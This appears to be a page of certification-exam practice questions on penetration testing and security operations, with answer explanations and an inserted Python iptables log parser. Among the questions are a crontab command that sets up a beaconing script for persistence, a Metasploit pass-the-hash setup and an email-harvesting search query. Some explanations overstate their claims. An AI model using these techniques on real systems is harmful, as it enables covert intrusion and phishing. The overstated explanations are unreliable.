Dion Test Prep
You are working as part of a penetration testing team conducting reconnaissance. Which of the following scan options should you use in Nmap to conduct a faster but still relatively stable scan? A. -T2 B. -T4 C. -T3 D. -T5
-T4 is the recommended choice for a faster scan that is still relatively stable. -T5 is the fastest scanning option but can be unstable if either your network or the target network's speed cannot maintain the timing. -T0 and -T1 are the best options for evading an intrusion detection system, but they are extremely slow to conduct the scan. -T2 slows the scan to conserve bandwidth. -T3 is the default and most stable scanning timing option.
You are working as part of a penetration testing team conducting reconnaissance. Which of the following scan options should you use in Nmap to use the fastest scanning speed, but it may become unstable? A. -T0 B. -T4 C. -T1 D. -T5
-T5 is the fastest scanning option but can be unstable if either your network or the target network's speed cannot maintain the timing. -T0 and -T1 are the best options for evading an intrusion detection system, but they are extremely slow to conduct the scan. -T2 slows the scan to conserve bandwidth. -T3 is the default and most stable scanning timing option. -T4 is the recommended choice for a faster scan that is still relatively stable.
You just completed an Nmap scan against a workstation and received the following output: nmap diontraining012 Port 135 139 445 Based on these results, which of the following operating systems is most likely being run by this workstation? A. Ubuntu B. macOS C. CentOS D. Windows
The workstation is most likely running a version of the Windows operating system. Port 139 and port 445 are associated with the SMB file and printer sharing service run by Windows. Since Windows 2000, the NetBIOS file and print sharing has been running over these ports on all Windows systems by default.
What is not one of the three categories of solutions that all of the pentester's recommended mitigations should fall into? A. Technology B. Process C. People D. Problems
All possible solutions can be categorized as People, Process, or Technology solutions.
What nmap switch would you use to determine which UDP ports are open on a targeted network? A. -sU B. -sP C. -sN D. -sS
In nmap, the -sU flag is used to scan UDP ports. The -sS flag will only scan TCP ports using a SYN scan. The -sP flag is a legacy (and deprecated) option for a ping scan. The -sN flag is used to conduct a TCP NULL scan.
Which of the following vulnerability scans would provide the best results if you want to determine if the target's configuration settings are correct? A. Internal scan B. Credentialed scan C. Non-credentialed scan D. External scan
Credentialed scans log into a system and retrieve its configuration information. Therefore, it should provide you with the best results. A non-credentialed scan relies on external resources for configuration settings that can be altered or incorrect. The scanner's network location does not directly impact the ability to read the configuration information, so it would not make a difference if you conducted an external or internal scan.
During a business trip, Bobby connects to the hotel's wireless network to send emails to some of his clients. The next day, Bobby notices that additional emails have been sent out from his account without consent. Which of the following protocols was MOST likely used to compromise Bobby's email password utilizing a network sniffer? A. HTTP B. TFTP C. SSL D. DNS
HTTP is an unsecured protocol, and information is passed without encryption. If the user signed into their webmail over HTTP instead of HTTPS, a network sniffer could compromise the username and password. Additionally, if the user was using an email client, then the SMTP connection could have been compromised, but since that wasn't an option in this question, we must assume Bobby used a webmail client over HTTP instead.
Your company wants to increase the security of its server room. Which TWO of the following should they install to protect the server room's contents? A. Bollard B. Biometric lock C. Badge reader D. Cable lock E. Strong passwords F. Privacy window shades
A badge reader and biometric lock can be used on a server room door to provide multifactor authentication. Biometrics are identifying features stored as digital data that can be used to authenticate a user. Typical features used include facial pattern, iris, retina, or fingerprint pattern, and signature recognition. This requires a relevant scanning device, such as a fingerprint reader, and a database of biometric information for authentication to occur. A badge reader can be used to read a security badge using RFID, a smart card, or a barcode to authenticate a user. Cable locks are used for laptops, not servers or server rooms. A bollard is used in the parking lot or the front of a building. Strong passwords are used for the servers, not the server room itself. Privacy window shades could be used, but they are not as strong a defense as a badge reader and biometric keypad on the door to the server room.
Jason is conducting a physical penetration test against a company. His objective is to enter the server room that is protected by a lock using a fingerprint reader. Jason attempts to use his finger to open the lock several times without success. He then turns his finger 45 degrees to the left, and the lock authenticates him. What is MOST likely the reason the lock opened? A. The crossover error rate is tuned towards false positives B. The crossover error rate is tuned towards true negatives C. The biometric lock is set to fail open after five invalid attempts D. The biometric lock is set to fail closed after five invalid attempts
A biometric lock is difficult to bypass unless the installer incorrectly configures it. If the biometric lock has a high false acceptance rate, it will allow unauthorized people to open the door. The crossover error rate (CER) is the point where the false acceptance and false rejection rates are equal. When charted on a graph, this point can lean more towards accepting false positives or rejecting true positives. If it leans more towards accepting false positives, the sensitivity has decreased to allow less frustration for its users.
You have just conducted an automated vulnerability scan against a static webpage without any user input fields. You have been asked to adjudicate the scanner's findings in the automated report. Which of the following is MOST likely to be a false positive? A. Insecure HTTP methods allowed B. Directory listing enabled C. Command injection allowed D. Reflected XSS
A command injection is unlikely since this is a static webpage and does not accept any user input. A command injection allows the user to supply malicious input to the web server and then passes that data to a system shell for execution. In this sense, command injection does create new instances of execution and can, therefore, leverage languages that the web app does not directly support.
A cybersecurity analyst is reviewing the logs of a Citrix NetScaler Gateway running on a FreeBSD 8.4 server and sees the following output: *IP* -- *DATE* "POST...newbm.pl HTTP/1.1" 200 143 *IP* -- *DATE* "GET...backdoor.xml HTTP/1.1" 200 941 *IP* -- *DATE* "POST...newbm.pl HTTP/1.1" 200 143 What type of attack was most likely being attempted by the attacker? A. XML injection B. Directory traversal C. Password spraying D. SQL injection
A directory traversal attack aims to access files and directories stored outside the webroot folder. By manipulating variables or URLs that reference files with "dot-dot-slash (../)" sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. The example output provided comes from a remote code execution vulnerability being exploited in which a directory traversal is used to access the files. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic. SQL injection is the placement of malicious code in SQL statements via web page input. Password spraying attempts to crack various users' passwords by attempting a compromised password against multiple user accounts.
You are conducting a wireless penetration test against an organization. During your attack, you created an evil twin of their wireless network. Many of the organization's laptops are now connected to your evil twin access point. Which of the following exploits should you utilize next to gather credentials from the victims browsing the internet through your access point? A. Downgrade attack B. Karma attack C. Fragmentation attack D. Deauthentication attack
A downgrade attack forces a client to use a weaker SSL version that the attacker can crack. Since the devices are connected through your access point, you can establish a weaker SSL-based HTTPS connection between their web browser and the actual web server they wanted. This forcing of the client to use a weaker version is known as a downgrade attack, and it allows the attacker to capture the packets and later crack them offline since SSL-based HTTPS is weak enough to crack due to vulnerabilities in its design. A fragmentation attack obtains the pseudorandom generation algorithm (PRGA) of network packets used in WEP. Deauthentication attacks are used in the service of an evil twin, replay, cracking, denial of service, and other attacks. All 802.11 Wi-Fi protocols include a management frame that a client can use to announce that it wishes to terminate a connection with an access point. The victim's device will be kicked off the access point by spoofing the victim's MAC address and sending the deauthentication frame to the access point. A karma attack is a variant of the evil twin attack. A karma attack exploits the behavior of a wireless client trying to connect to its preferred network list. This list contains the SSIDs of access points the device has connected to in the past. When a wireless device is looking to connect to the internet, it first beacons to determine if any of these previously connected networks are within range.
You are attempting to exploit a network-based vulnerability against a Windows server. You configure Metasploit with the following options below and enter the run command. set smbpass set payload set lhost set lport run Which of the following types of exploits are you attempting? A. Pass the hash B. Sandbox escape C. Credential harvesting D. Credential brute forcing
A pass the hash attack is a network-based attack where the attacker steals hashed user credentials and uses them as-is to try to authenticate to the same network the hashed credentials originated on. When authenticating with a username and password, the password is hashed once you type it in. Therefore, the computer doesn't recognize a difference between the password and the hash itself. So, if you use psexec to send the hash to the system directly, it can be used to authenticate you as that user without actually knowing the user's password. The key to answering this question is identifying that the smbpass parameter is being set to a password hash of a specified user.
You are working as a penetration tester conducting an engagement against Dion Training's corporate network. The known-environment assessment was designed to take four months of reconnaissance and two weeks of active engagement. The first week is focused on breaching the external perimeter, and the second week is focused on the internal servers. Your team has spent the last 3 months researching ways to exploit and bypass the firewalls and IPS at Dion Training. You just received a call from Dion Training stating that they just replaced their firewalls and IPS appliances with a state-of-the-art UTM. You recommend to the client that if you cannot exploit the UTM within the first 3 days, your team's source IP addresses should be allow listed to focus their time on the internal network. Which of the following BEST describes this scenario? A. Goal reprioritization B. De-confliction C. De-escalation D. Situational awareness
A penetration test is a fluid process based on the people, processes, and technology involved. When the company changed its architecture, it essentially invalidated much of the research your team conducted. The recommendation to allow list the source IP addresses is a goal reprioritization. Without adequate preparation time, it is unlikely you will exploit or bypass the new UTM appliances. Therefore, you suggest that the client reprioritize the engagement to focus on the internal network during this assessment to make the best use of your time and resources.
You are conducting a penetration test and have been asked to simulate an APT. You have established TLS network connections from a victimized host in the organization's intranet to your workstation, which you are using to attempt data exfiltration from the server. The TLS connection is occurring from an end user's workstation over an ephemeral port to your workstation's listener set up on port 443. You have placed modified versions of svchost.exe and cmd.exe in the victimized host's %TEMP% folder and set up scheduled tasks to establish a connection from the victimized host to your workstation every morning at 3 am. Which of the following types of post-exploitation techniques is being used? A. Reverse shell B. Trojan C. Daemon D. Bind shell
A reverse shell is established when the target machine communicates with an attack machine that is listening on a specific port. Reverse shells are effective in bypassing firewalls, port filtering, and network address translations, unlike a bind shell. A bind shell allows a target system to bind its shell to a local network port and accept inbound connections. Bind shells may be blocked by a firewall filtering incoming traffic on the given port, though. A trojan is a malicious software program hidden within an innocuous-seeming piece of software. Usually, the Trojan is used to try to compromise the security of the target computer. A daemon is used on Linux systems to act as a service that runs in the background without being attached to a terminal.
Sarah is conducting a penetration test against Dion Training's Linux-based network. This engagement aims to simulate an advanced persistent threat and demonstrate persistence for 30 days without their system administrators identifying the intrusion. Which of the following commands should Sarah use to run a script that beacons back to her computer every 20 minutes? A. schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MONTHLY B. (crontab -l; echo "*/20 * * * * /tmp/beacon.sh") | crontab - C. (crontab -l; echo "* */20 * * * /tmp/beacon.sh") | crontab - D. schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE
A scheduled task or scheduled job is an instance of execution, like initiating a process or running a script, that the system performs on a set schedule. Once the task executes, it can prompt the user for interaction or run silently in the background; it all depends on what the task is set up to do. Scheduled tasks in Linux use the crontab command. The correct answer for this persistence is to enter the command (crontab -l ; echo "*/20 * * * * /tmp/beacon.sh") | crontab - which will run the script at /tmp/beacon.sh every 20 minutes as the SYSTEM level user. The other variant of crontab is incorrect because it would run every 20 hours, not 20 minutes. The schtasks options are used in Windows, not in Linux.
A new piece of malware attempts to exfiltrate user data by hiding the traffic and sending it as TLS-encrypted outbound traffic over random ports. What technology would be able to detect and block this type of traffic? A. Stateless packet inspection B. Stateful packet inspection C. Application-aware firewall D. Intrusion detection system
A web application firewall (WAF) or application-aware firewall would detect both the accessing of random ports and TLS encryption and identify it as suspicious. An application-aware firewall can make decisions about what applications are allowed or blocked by a firewall, and TLS connections are created and maintained by applications. A stateless packet inspection firewall allows or denies packets into the network based on the source and destination IP address or the traffic type (TCP, UDP, ICMP, etc.). A stateful packet inspection firewall monitors the active sessions and connections on a network. The process of stateful inspection determines which network packets should be allowed through the firewall by utilizing the information it gathered regarding active connections as well as the existing ACL rules. Neither a stateless nor stateful inspection firewall operates at layer 6 or layer 7, so they cannot inspect TLS connections. An intrusion detection system (IDS) is a device or software application that monitors a network or systems for malicious activity or policy violations. An IDS only monitors the traffic on the network, it cannot block traffic.
A penetration tester hired by a bank began searching for the bank's IP ranges by performing lookups on the bank's DNS servers, reading news articles online about the bank, monitoring what times the bank's employees came into and left work, searching job postings (with a special focus on the bank's information technology jobs), and even searching the dumpster at the bank's corporate office. Based on this description, what portion of the penetration test is being conducted? A. Active information gathering B. Information reporting C. Vulnerability assessment D. Passive information gathering
Passive information gathering consists of numerous activities where the penetration tester gathers open-source or publicly available information without the organization under investigation being aware that the information has been accessed. Instead, active information gathering starts to probe the organization using DNS Enumeration, Port Scanning, and OS Fingerprinting techniques. Vulnerability assessments are another form of active information gathering. Information reporting occurs after the penetration test is complete, and it involves writing a final report with the results, vulnerabilities, and lessons learned during the assessment.
Which of the following type of threats did the Stuxnet attack rely on to cross an air gap between a business and an industrial control system network? A. Removable media B. Directory traversal C. Session hijacking D. Cross-site scripting
Air gaps are designed to remove connections between two networks to create a physical segmentation between them. The only way to cross an air gap is to have a physical device between these systems, such as using a removable media device to transfer files between them. A directory traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server's root directory. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. A directory traversal, cross-site scripting, or session hijacking attack cannot by itself cross an air gap.
What is a common Service Oriented Architecture Protocol (SOAP) vulnerability? A. XML denial of service B. Xpath injection C. Cross-site scripting D. SQL injection
An XML denial of service (or XML bomb) attempts to pull in entities recursively in a defined DTD and explode the amount of memory used by the system until a denial of service condition occurs. Service-Oriented Architecture (SOA) is an architectural paradigm, and it aims to achieve a loose coupling amongst interacting distributed systems. SOA is used by enterprises to efficiently and cost-effectively integrate heterogeneous systems. However, SOA is affected by several security vulnerabilities, affecting the speed of its deployment in organizations. SOA is most commonly vulnerable to an XML denial of service. While the other options could be used as part of an attack on SOAP, the SOAP message itself is formatted as an XML document making an XML denial of service the most common vulnerability. While SOAP requests are vulnerable to SQL injections, this occurs by submitting a parameter as a morphed SQL query that can authenticate or reveal sensitive information as an attack on the underlying SQL. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XPath Injections operate on websites that use user-supplied information to construct an XPath query for XML data.
You are working as part of a DevSecOps team at Dion Training on a new practice exam Android application. You need to conduct static analysis on the APK (Android PacKage) as part of your software assurance responsibilities. Which actions should you use to convert the APK back into the source code to analyze the type of information an attacker might gain during reverse engineering the APK? A. Compile the APK into a JAR and then convert it into the DEX source code B. Decompile the DEX to a JAR file and then convert the JAR into Java C. Convert the DEX to a JAR file and then decompile the JAR into Java D. Convert the Java code in the APK to a JAR file and then cross-compile it to a DEX
Android apps come packaged as APKs (Android PacKages). The APK contains all the application files, including the DEX file (Android bytecode/binary). To reverse the APK into the source code to conduct a static analysis, you can convert the DEX file to a JAR (Java Archive) file. Then, you can decompile the JAR file into Java source code using a decompiler. While the specifics on how to do all of this are beyond the exam's scope, you should understand the concepts and basic steps involved per the exam objectives.
Dion Training wants to implement technology within their corporate network to BEST mitigate the risk that a zero-day virus might infect their workstations. Which of the following should be implemented FIRST? A. Intrusion detection system B. Host-based firewall C. Anti-malware solution D. Application allow list
An application allow list will only allow a program to execute if it is specifically listed in the approved exception list. All other programs are blocked from running. This makes it the BEST mitigation against a zero-day virus. An intrusion detection system might detect the anomalous activity created by a piece of malware, but it will only log or alert based on the activity, not prevent it. A host-based firewall may prevent a piece of malware from establishing a network connection with a remote server. Still, again, it wouldn't prevent infection or prevent it from executing. An anti-malware solution is a good investment towards improving your security. Since the threat is a zero-day virus, an anti-malware solution will not detect it using its signature database.
You are preparing for the exploitation of Dion Training's systems as part of a penetration test. During your research, you determined that Dion Training is using application containers for each of its websites. You believe that these containers are all hosted on the same physical underlying server. Which of the following components should you attempt to exploit to gain access to all of the websites at once? A. Hypervisor vulnerability B. Common libraries C. Their e-commerce website's web application D. Configuration files
Application containers are virtualized environments designed to package and run a single computing application or service and share the same host kernel. Since they share the same host kernel, they use common libraries, as well. If you can exploit the common libraries, you will gain access to every website on that server, even if they are in an application container. An application container does not use a hypervisor like a typical virtual machine. Configuration files are unique to each application container. The e-commerce website's web application is likely hosted in a single application container and, therefore, would not provide you access to every website simultaneously if exploited.
Which of the following techniques is not appropriate to use during a passive reconnaissance exercise against a specific target company? A. Registrar checks B. BGP looking glass usage C. Banner grabbing D. WHOIS lookups
Banner grabbing requires a connection to the host to grab the banner successfully. This is an active reconnaissance activity. All other options are considered passive processes and typically use information retrieved from third parties that do not directly connect to an organization's remote host.
You are working as part of a penetration testing team conducting reconnaissance. You have received the following frame of a network session sent from your team to an authenticated host on the network: Sender MAC Address: 00:1d:09:f0:92:ab Target MAC Address: 00:1a:6b:6c:0c:cc During your previous reconnaissance, you determined that the target network uses layer 2 data to control which devices can gain access to their wireless network. Which of the following network identifiers should you use to effectively spoof your client's address and gain access to the network? A. 10.10.10.1 B. 00:1d:09:f0:92:ab C. 00:1a:6b:6c:0c:cc D. 10.10.10.2
Based on the scenario, you need to identify the right MAC address to use during MAC spoofing to gain access to the wireless network and bypass its MAC filtering. Since the scenario states that your team member sent the frame to an authenticated host, you need to use the target MAC address when spoofing your client onto the network.
You are working as part of a penetration testing team targeting Dion Training's website. Which of the following tools should you use to attempt an XSS or injection attack against their website? A. BeEF B. Nikto C. Androzer D. Netcat
BeEF (Browser Exploitation Framework) is a penetration testing tool included with Kali Linux that focuses on web browsers. BeEF can be used for XSS and injection attacks against a website. Netcat is an open-source networking utility for debugging and investigating the network that can be used to create TCP/UDP connections and investigate them. Nikto is an open-source web server scanner that searches for potentially harmful files, checks for outdated web server software, and looks for problems with some web server software versions. Androzer is a security testing framework for Android apps and devices.
What is the term for exploiting a weakness in a user's wireless headset to compromise their smartphone? A. Bluejacking B. Zero-day attack C. Multiplexing D. Smurfing
Bluejacking is the sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs, or laptop computers, sending a vCard which typically contains a message in the name field to another Bluetooth-enabled device via the OBEX protocol. A zero-day attack happens once that flaw, or software/hardware vulnerability, is exploited and attackers release malware before a developer has an opportunity to create a patch to fix the vulnerability. The Smurf attack is a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol packets with the intended victim's spoofed source IP are broadcast to a computer network using an IP broadcast address. Multiplexing is a method by which multiple analog or digital signals are combined into one signal over a shared medium to share a scarce resource. Multiplexing is not a type of exploit or attack but is heavily used to increase the bandwidth of wireless networks and fiber optic connections.
Which type of method is used to collect information during the passive reconnaissance? A. Social engineering B. Network traffic sniffing C. Reviewing public repositories D. API requests and responses
Passive reconnaissance focuses on collecting information that is widely and openly available from publicly available sources. While network traffic sniffing is considered passive, gaining access to the network to place a sniffer in a good network tap location would not be considered passive. Of the choices provided, publicly accessible sources are the best answer to choose. Collecting API requests and responses would involve a penetration tester sending data to a given server and analyzing the responses received, which is considered an active reconnaissance method. Social engineering is also an active reconnaissance technique that uses deception to trick a user into providing information to an attacker or penetration tester.
Dion Consulting Group has just won a contract to provide updates to an employee payroll system originally written years ago in C++. During your assessment of the source code, you notice the function "strcpy" is being used in the application. Which of the following is cause for concern, and what mitigation would you recommend to overcome it? A. strcpy could allow an integer overflow to occur; upgrade the operating system to run ASLR to prevent a buffer overflow B. strcpy could allow a buffer overflow to occur; upgrade the operating system to run ASLR to prevent a buffer overflow C. strcpy could allow an integer overflow to occur; you should rewrite the entire system in Java D. strcpy could allow a buffer overflow to occur; you should rewrite the entire system in Java
C and C++ contain built-in functions such as strcpy that do not provide a default mechanism for checking if data will overwrite the boundaries of a buffer. The developer must identify such insecure functions and ensure that every call made to them by the program is performed securely. Many development projects use higher-level languages, such as Java, Python, and PHP. These interpreted languages will halt execution if an overflow condition is detected. However, changing languages may be infeasible in an environment that relies heavily on legacy code. By ensuring that the operating system supports ASLR, you can make it impossible for a buffer overflow to work by randomizing where objects in memory are being loaded. Rewriting the source code would be highly desirable but could be costly, time-consuming, and would not be an immediate mitigation to this problem. The strcpy function (which is short for String copy) does not work on integers, and it only works on strings. As strcpy does not check for boundary conditions, buffer overflows are certainly possible using this deprecated method.
Dion Training wants to increase the speed of response from its secure web servers when users attempt to connect to it. The company wants to enable a feature that will allow the webserver to host its SSL/TLS certificate status itself and have it time-stamped periodically by the issuing CA. This method would allow the student's web browser to only connect to the website instead of creating an individual certificate status query to the CA each time they try to connect to the site. Which of the following PKI solutions should Dion Training implement to achieve this? A. Online certificate status protocol B. Certificate pinning C. Certificate stapling D. Certificate revocation list
Certificate stapling allows a webserver to perform certificate status checking instead of having the browser perform the checking. The web server checks the status of a certificate and provides the browser with the digitally signed response from the OCSP responder. Certificate stapling is much faster than using individual queries to the CA using OCSP. The online certificate status protocol (OCSP) allows clients to request the status of a digital certificate and to check whether it is revoked. A certificate revocation list (CRL) is a list of every digital certificate that has been revoked before its expiration date. Certificate pinning is a deprecated method of trusting digital certificates that bypasses the CA hierarchy and chain of trust to minimize on-path (formerly man-in-the-middle) attacks.
Which of the following tools should a penetration tester use to conduct post-exploitation identification of vulnerabilities in a Windows Active Directory environment? A. CrackMapExec B. CeWL C. Wapiti D. Brakeman
CrackMapExec is a post-exploitation tool used to identify and exploit weaknesses in Active Directory environments. Brakeman is a static code analysis security tool for Ruby on Rails applications that checks for vulnerabilities and provides a confidence level for each finding (high, medium, or weak). CeWL (Custom Word List generator) is a word list generator that crawls a website and collects words from its text, metadata, and other files found on the site. Wapiti is a web application vulnerability scanner that crawls a web app to find areas where it can inject data.
A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company's security controls. Which DNS assessment technique would be classified as active? A. A Zone transfer B. Using Maltego C. A whois query D. A DNS forward or reverse lookup
A DNS zone transfer, often referred to by the DNS query type that initiates it (AXFR), is a DNS transaction type. It is one of the mechanisms administrators use to replicate DNS databases across a set of DNS servers, and requesting one from a target's name server is an active technique because the request is sent directly to the target's infrastructure. Performing a whois query is passive reconnaissance: it queries the databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, and is also used for a wider range of other information. Performing DNS forward and reverse lookups resolves names to IP addresses and IP addresses to names; because these queries can be answered by public resolvers (often from cached data) rather than by the target's own servers, they are treated as a passive technique here. Maltego is used for open-source intelligence and forensics. It provides a library of transforms for data discovery from open sources and visualizes the results as a graph suitable for link analysis and data mining. It collects this information passively, since it can obtain it from whois servers, public DNS servers, or the email addresses and hostnames gathered by theHarvester.
DeepScan supports data-flow analysis and understands the execution flow of a program. It allows you to see possible security flaws without executing the code. Which of the following types of tools would DeepScan be classified as? A. Decompiler B. Fault injector C. Fuzzer D. Static code analyzer
DeepScan is an example of a static code analysis tool. It inspects the code for possible errors and issues without actually running the code. Fuzzing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program through a fuzzer. A decompiler is a computer program that takes an executable file as input and attempts to create a high-level source file that can be recompiled successfully. Fault injection is a testing technique that aids in understanding how a system behaves when stressed in unusual ways. A fuzzer and a fault injector are dynamic analysis tools because they require the program to be run during testing; a decompiler works on the compiled binary rather than the source and recovers code rather than reporting flaws, so none of the three matches the description.
Evaluate the following log entry: Date 1x1 Kernel: iptables INPUT drop IN=eth0 OUT= DPT=23 Based on this log entry, which of the following statements are true? A. The packet was blocked inbound to the network B. The packet was blocked outbound from the network C. An attempted connection to the telnet service was prevented D. An attempted connection to the ssh service was prevented MAC filtering is enabled on the firewall E. Packets are being blocked inbound to and outbound from the network
Firewall log formats vary by vendor, but this example uses the commonly seen format of the Linux iptables LOG target. The entry starts with the date and time of the event and then provides several key pieces of information. The word "drop" in the log prefix shows the action this entry recorded: the firewall dropped a packet because a rule in the INPUT chain matched it. IN=eth0 (with OUT= empty) shows that the packet was received on the eth0 interface, so we know that packets are being inspected and blocked when they are headed inbound to the network. Next come the MAC field (the destination MAC, source MAC, and EtherType of the frame), the source (SRC) IP address, and the destination (DST) IP address. Further along are the source (SPT) and destination (DPT) ports. Here the DPT is 23, the well-known port for telnet, so an attempted telnet connection was prevented. Based on this single log entry, we cannot tell whether packets are also being blocked when they attempt to leave the network, whether connections to the ssh service (port 22) are being blocked, or whether MAC filtering is enabled; the MAC field is simply part of every iptables log entry for a packet received on an Ethernet interface.
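The parser below is an added example, not code from the original page, that pulls the fields discussed above out of iptables LOG lines and then summarizes what a given set of lines does and does not prove. The sample lines are constructed, and the "<tag> <CHAIN> <action>" layout of the log prefix is an assumption (the prefix is whatever --log-prefix the matching rule set).

```python
import re
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed sample lines in syslog + iptables LOG-target format (not from the original page).
# The text between "kernel:" and "IN=" is the rule's --log-prefix; the "<tag> <CHAIN> <action>"
# layout used here ("iptables INPUT drop") is an assumption about how the rules were written.
SAMPLE_LOG = """\
Mar  3 10:02:17 gw kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:0c:29:11:22:33:00:50:56:aa:bb:cc:08:00 SRC=203.0.113.5 DST=192.0.2.10 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=51234 DPT=23 WINDOW=29200 RES=0x00 SYN URGP=0
Mar  3 10:02:19 gw kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:0c:29:11:22:33:00:50:56:aa:bb:cc:08:00 SRC=203.0.113.5 DST=192.0.2.10 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=51235 DPT=22 WINDOW=29200 RES=0x00 SYN URGP=0
Mar  3 10:02:40 gw kernel: iptables OUTPUT drop IN= OUT=eth0 SRC=192.0.2.10 DST=198.51.100.7 LEN=52 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF PROTO=TCP SPT=40000 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0
"""

WELL_KNOWN_PORTS = {22: "ssh", 23: "telnet", 25: "smtp", 80: "http", 443: "https"}

LINE_RE = re.compile(r"kernel: (?P<prefix>.*?) IN=(?P<in>\S*) OUT=(?P<out>\S*) (?P<rest>.*)$")


@dataclass
class FirewallEvent:
    chain: str        # INPUT / OUTPUT / FORWARD, taken from the log prefix
    action: str       # drop / accept / reject, taken from the log prefix
    direction: str    # "inbound" when IN= names an interface, "outbound" when only OUT= does
    src_mac: Optional[str]
    src: str
    dst: str
    proto: str
    spt: Optional[int]
    dpt: Optional[int]
    service: str      # service name for the destination port, if it is well known


def parse_line(line: str) -> Optional[FirewallEvent]:
    """Parse one iptables LOG line; return None for lines in any other format."""
    m = LINE_RE.search(line)
    if not m:
        return None
    # Remaining tokens are KEY=VALUE pairs plus bare flags such as DF or SYN (ignored here)
    fields: Dict[str, str] = dict(
        tok.split("=", 1) for tok in m.group("rest").split() if "=" in tok
    )
    prefix = m.group("prefix").split()
    chain = prefix[-2] if len(prefix) >= 2 else ""
    action = prefix[-1].lower() if prefix else ""
    if m.group("in"):
        direction = "inbound"
    elif m.group("out"):
        direction = "outbound"
    else:
        direction = "unknown"
    # MAC= holds destination MAC, source MAC and EtherType (6 + 6 + 2 bytes); source MAC is bytes 7-12
    mac = fields.get("MAC")
    src_mac = ":".join(mac.split(":")[6:12]) if mac else None
    dpt = int(fields["DPT"]) if "DPT" in fields else None
    return FirewallEvent(
        chain=chain,
        action=action,
        direction=direction,
        src_mac=src_mac,
        src=fields.get("SRC", ""),
        dst=fields.get("DST", ""),
        proto=fields.get("PROTO", ""),
        spt=int(fields["SPT"]) if "SPT" in fields else None,
        dpt=dpt,
        service=WELL_KNOWN_PORTS.get(dpt, "unknown"),
    )


def summarize(log_text: str) -> Dict[str, object]:
    """What the given lines prove about the firewall: only counts what was actually logged."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e is not None]
    dropped = [e for e in events if e.action == "drop"]
    return {
        "inbound_dropped": sum(1 for e in dropped if e.direction == "inbound"),
        "outbound_dropped": sum(1 for e in dropped if e.direction == "outbound"),
        "blocked_services": sorted({e.service for e in dropped}),
    }
```

Running summarize on just the first sample line reports one inbound drop of telnet and nothing about outbound traffic or ssh, which is exactly the limit of what the question's single entry supports; only the full sample shows an outbound drop and a blocked ssh attempt.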
A malicious user is blocking cellular devices from connecting to the Internet whenever they enter the coffee shop. If they get their coffee to go and walk at least a block away from the coffee shop, their smartphones will connect to the Internet again. What type of network attack is the malicious user performing? A. On-path attack B. Frequency jamming C. Spoofing D. Blocklisting IP addresses in the ACL
Frequency jamming is one of the many techniques used to compromise a wireless environment. Frequency jamming is the disruption of radio signals through the use of an over-powered signal in the same frequency range. It denies service to authorized users because legitimate traffic is drowned out by the attacker's illegitimate signal. There is no indication in this scenario that the malicious user has created a rogue AP (which is a form of spoofing) or is performing an on-path attack by having users connect through their laptop or device. Also, there is no mention of certain websites or devices being blocked logically using a blocklist or ACL.
A coworker is conducting open-source intelligence gathering for an upcoming penetration test against Dion Training. You look over their shoulder and see them enter the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search? A. Returns all web pages hosted at diontraining.com B. Returns no useful results for an attacker C. Returns all web pages containing the text diontraining.com D. Returns all web pages containing an email address affiliated with diontraining.com
Google interprets this statement as <anything>@diontraining.com and understands that the user is searching for email addresses, since %40 is the URL-encoded (percent-encoded) form of the @ symbol. The * is a wildcard character, meaning that any text can be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com, which could be used as part of a spear phishing campaign. To return all web pages hosted at diontraining.com, you should use the "site:" modifier in the query. To return all web pages containing the text diontraining.com, enter "diontraining.com" into the Google search bar with no modifiers.
Which of the following tools should a penetration tester use to conduct password cracking of multiple network authentication types simultaneously? A. w3af B. Gobuster C. Mimikatz D. Hydra
Hydra is a password cracking tool that supports parallel testing of several network authentication types simultaneously. Mimikatz is a tool that gathers credentials by extracting key elements from memory such as cleartext passwords, hashes, and PIN codes. Gobuster is a tool that can discover subdomains, directories, and files by brute-forcing from a list of common names. The Web Application Attack and Audit Framework (w3af) allows you to identify and exploit a large set of web-based vulnerabilities, such as SQL injection and cross-site scripting.
Cybersecurity analysts are experiencing some issues with their vulnerability scans aborting because the previous day's scans are still running when the scanner attempts to start the current day's scans. Which of the following recommendations is LEAST likely to resolve this issue? A. Add another vulnerability scanner B. Reduce the sensitivity of scans C. Reduce the scope of scans D. Reduce the frequency of scans
If the cybersecurity analyst were to reduce the scans' sensitivity, it still would not decrease the time spent scanning the network and could alter the effectiveness of the results received. In this scenario, the scans, as currently scoped, are taking more than 24 hours to complete with the current resources. The analyst could reduce the scans' scope, thereby scanning fewer systems or vulnerabilities signatures and taking less time to complete. Alternatively, the analyst could reduce the scans' frequency by moving to a less frequent schedule, such as one scan every 48 hours or one scan per week. The final option would be to add additional vulnerability scanners to the process. This would allow the two scanners to work together to divide the workload and complete the task within the 24-hour scan frequency currently provided.
Consider the following data structure: { "id" : "Bundle--" } Which of the following best describes the data structure presented above? A. JSON B. Array C. Key-value pair D. CSV
